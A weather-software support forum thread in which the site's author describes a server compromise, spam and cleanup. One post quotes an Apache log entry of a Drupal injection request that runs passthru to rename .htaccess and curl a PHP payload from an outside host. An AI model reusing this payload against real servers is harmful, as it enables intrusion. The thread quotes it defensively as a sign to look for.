Welcome to the Cumulus Support forum.

Latest Cumulus MX V3 release 3.28.6 (build 3283) - 21 March 2024

Cumulus MX V4 beta test release 4.0.0 (build 4017) - 17 March 2024

Legacy Cumulus 1 release v1.9.4 (build 1099) - 28 November 2014 (a patch is available for 1.9.4 build 1099 that extends the date range of drop-down menus to 2030)

Download the Software (Cumulus MX / Cumulus 1 and other related items) from the Wiki

Site going down.

Talk about anything that doesn't fit elsewhere - PLEASE don't put Cumulus queries in here!
User avatar
ConligWX
Posts: 1570
Joined: Mon 19 May 2014 10:45 pm
Weather Station: Davis vPro2+ w/DFARS + AirLink
Operating System: Ubuntu 22.04 LTS
Location: Bangor, NI
Contact:

Re: Site going down.

Post by ConligWX »

Lets hope you've fixed it so you and the wife can get on with the holiday.
Regards Simon

https://www.conligwx.org - @conligwx
Davis Vantage Pro2 Plus with Daytime FARS • WeatherLink Live • Davis AirLink • PurpleAir •

Image
Matt.j5b
Posts: 512
Joined: Mon 28 Nov 2011 2:13 am
Weather Station: Davis VP2/ WLL with DFARS
Operating System: RPi Raspbian (Buster)
Location: Ferny Grove, Brisbane, Australia
Contact:

Re: Site going down.

Post by Matt.j5b »

It's good to hear you have been making progress and thanks for trying to resolve this. It's a horrible shame how low some people are in what they do to cause trouble. Hopefully you have fixed the issue and you do enjoy your holiday. :)
Regards, Matt of Brisbane, Australia
Ferny Grove Weather
Image
jlmr731
Posts: 225
Joined: Sat 27 Aug 2016 12:11 am
Weather Station: Davis vantage pro 2
Operating System: Debian
Location: Wickliffe, Ohio
Contact:

Re: Site going down.

Post by jlmr731 »

Any chance that you can give us a little insight on the script they used to keep it running, or what one should look for.
May be helpful for other's to know what to do if they have this problem to stop these script kiddies.

Thanks Steve for your hard work getting this problem resolved while on holiday.
User avatar
steve
Cumulus Author
Posts: 26702
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Post by steve »

I don't really have much to offer, I just deleted installations of things like Wordpress and Drupal which hadn't been kept up to date. This entry (and others similar) in the apache log looked suspicious (thanks go to Ken for suggesting that a suspicious POST was something to look for) and from googling it appeared to be related to a Drupal vulnerability;

85.126.200.23 - - [08/Oct/2018:04:43:19 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23type]=markup&name[%23markup]=mv+sites/default/.htaccess+htaccessx;curl+-o+sites/default/api.php+'http://saint-laurent-gorre.fr/_inc/_phpThumb/demit.aff' HTTP/1.1" 200 8120 "-" "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36"

I realised that I had been wrong about the spam not coming from the server when I had turned off all the legitimate sources of email and there were still smtp connections being made. I also had a number of (supposedly) exim processes running, and I don't have exim installed. Some malware disguises itself as exim, amongst other things.

It makes you realise that Linux is no more secure than Windows unless you really know what you're doing and keep on top of vulnerability notices and keep everything up to date. Although I believe this incident was my fault for not keeping things up to date, I do now regret allowing some users to install things like PHPBB and Wordpress.
Steve
RayProudfoot
Posts: 3372
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Post by RayProudfoot »

Steve, thanks for the update. Way over my head I’m afraid. Does this now mean the malware is no more and the hosting company have removed the threat of closure?
Cheers,
Ray, Cheshire.

Image
User avatar
steve
Cumulus Author
Posts: 26702
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Post by steve »

I believe the malware is no more, although there is still a slight oddity to be explained, but this apparently is not doing any harm. Hetzner are going to review after two days. After which I will re-enable the outgoing smtp port so that mail from the forum will start working again, and hopefully the server will eventually stop being flagged as a risk - I’ve noticed in the mail logs that some destinations are refusing mail from us.
Steve
RayProudfoot
Posts: 3372
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Post by RayProudfoot »

Thanks Steve. I’m breathing a huge sigh of relief. Things looked very bleak over the weekend but you’ve done a great job in sorting things out aided by Ken. :clap:
Cheers,
Ray, Cheshire.

Image
User avatar
hornychz
Posts: 10
Joined: Mon 11 May 2015 3:54 pm
Weather Station: WeatherDuino Pro2
Operating System: Raspbian Wheezy
Location: Brandys nad Labem - Stara Boleslav, Czech republic
Contact:

Re: Site going down.

Post by hornychz »

:clap: :)
User avatar
ConligWX
Posts: 1570
Joined: Mon 19 May 2014 10:45 pm
Weather Station: Davis vPro2+ w/DFARS + AirLink
Operating System: Ubuntu 22.04 LTS
Location: Bangor, NI
Contact:

Re: Site going down.

Post by ConligWX »

It sounds like more a php injection vulnerability than linux itself being hacked. php CMS's are plagued with security holes and by only updating them when updates are released can you try to secure a site.

Steve, on that note you would be advised to update phpBB. your running a version that needs updated ;)

pm sent...
Regards Simon

https://www.conligwx.org - @conligwx
Davis Vantage Pro2 Plus with Daytime FARS • WeatherLink Live • Davis AirLink • PurpleAir •

Image
RayProudfoot
Posts: 3372
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Post by RayProudfoot »

Not sure if this related or not but when I log into my account with FileZilla it notifies me the certificate has expired. Is that a potential area of concern?
Cheers,
Ray, Cheshire.

Image
User avatar
steve
Cumulus Author
Posts: 26702
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Post by steve »

I created a dummy certificate when I enabled secure ftp on the server when testing the code I added to Cumulus MX. Filezilla will try to use secure ftp in preference and will get the dummy certificate. I suppose I should really disable secure ftp on the server, I get asked about this regularly. The last time I was asked, I forgot how it was supposed to work, and broke the server for a short time trying to fix something that didn’t need fixing!

At some point I may look into getting a proper certificate, now that they can be had for free.

(Short answer: no :) )
Steve
RayProudfoot
Posts: 3372
Joined: Wed 06 May 2009 6:29 pm
Weather Station: Davis VP2 with Daytime FARS
Operating System: Windows XP SP3
Location: Cheadle Hulme, Cheshire, England
Contact:

Re: Site going down.

Post by RayProudfoot »

Thanks Steve. Not a major issue for me but given recent events thought it worth asking. I imagine you're feeling a lot better now! Time for a beer or two! :D
Cheers,
Ray, Cheshire.

Image
User avatar
steve
Cumulus Author
Posts: 26702
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Post by steve »

The spam has started again. I have blocked outgoing traffic on port 25 and will investigate when I get home, I've had enough of this for now.

I strongly advise anyone whose web site is on this server to start making alternative arrangements. I will refund any payments made, pro-rata, on request to steve@nybbles.co.uk
Steve
User avatar
saratogaWX
Posts: 1170
Joined: Wed 06 May 2009 5:02 am
Weather Station: Davis Vantage Pro Plus
Operating System: Windows 10 Professional
Location: Saratoga, CA, USA
Contact:

Re: Site going down.

Post by saratogaWX »

Ouch. I’ll be glad to analyze the logs again, Steve.

Best regards,
Ken
User avatar
steve
Cumulus Author
Posts: 26702
Joined: Mon 02 Jun 2008 6:49 pm
Weather Station: None
Operating System: None
Location: Vienne, France
Contact:

Re: Site going down.

Post by steve »

Thanks, Ken, when I get chance I’ll zip them up for you.
Steve
Post Reply